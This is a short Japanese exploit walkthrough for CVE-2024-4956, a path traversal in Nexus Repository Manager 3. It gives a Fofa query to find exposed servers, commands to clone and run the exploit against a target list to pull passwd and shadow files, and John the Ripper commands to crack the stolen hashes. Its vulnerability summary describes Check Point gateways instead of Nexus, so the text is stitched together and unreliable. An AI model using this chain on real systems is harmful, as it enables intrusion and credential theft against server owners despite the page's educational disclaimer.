
POC - CVE-2024–4956 - Nexus Repository Manager 3 認証なしのパストラバーサル
攻撃者がインターネットに接続され、Remote Access VPNまたはMobile Access Software Bladesが有効になっているCheck Point Security Gateways上の特定の情報を読み取る可能性があります。この脆弱性を緩和するセキュリティ修正が利用可能です。
詳細を読む — CVE-2024-4956
免責事項: この概念実証(POC)は教育および倫理的なテスト目的のみで作成されています。対象に対する事前の相互同意なしにこのツールを使用して攻撃することは違法です。エンドユーザーは、該当するすべての地域、州、連邦法を遵守する責任があります。開発者は一切の責任を負わず、このプログラムの誤用や損害についても責任を負いません。
潜在的なターゲットを見つけるには、Fofa(Shodan.ioと類似)を使用します:
header="Server: Nexus/3.53.0-01 (OSS)"
まず、リポジトリをクローンします:
git clone https://github.com/verylazytech/CVE-2024-4956
次に、ターゲットを選択し、次の形式でlist.txtファイルに追加します:
エクスプロイトを実行します:
python3 CVE-2024-4956.py -l list.txt
出力は、見つかったpasswdファイルとshadowファイルです:

passwdとshadowの両方のファイルを見つけたら、JohnTheRipperを使用してハッシュのクラックを試みることができます。エクスプロイト実行後、passwdとshadowの2つのファイルがあるため、それらを1つのファイルにマージしてクラックを試みます(ここではrockyou.txtを使用していますが、任意のパスワードワードリストを使用可能です):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt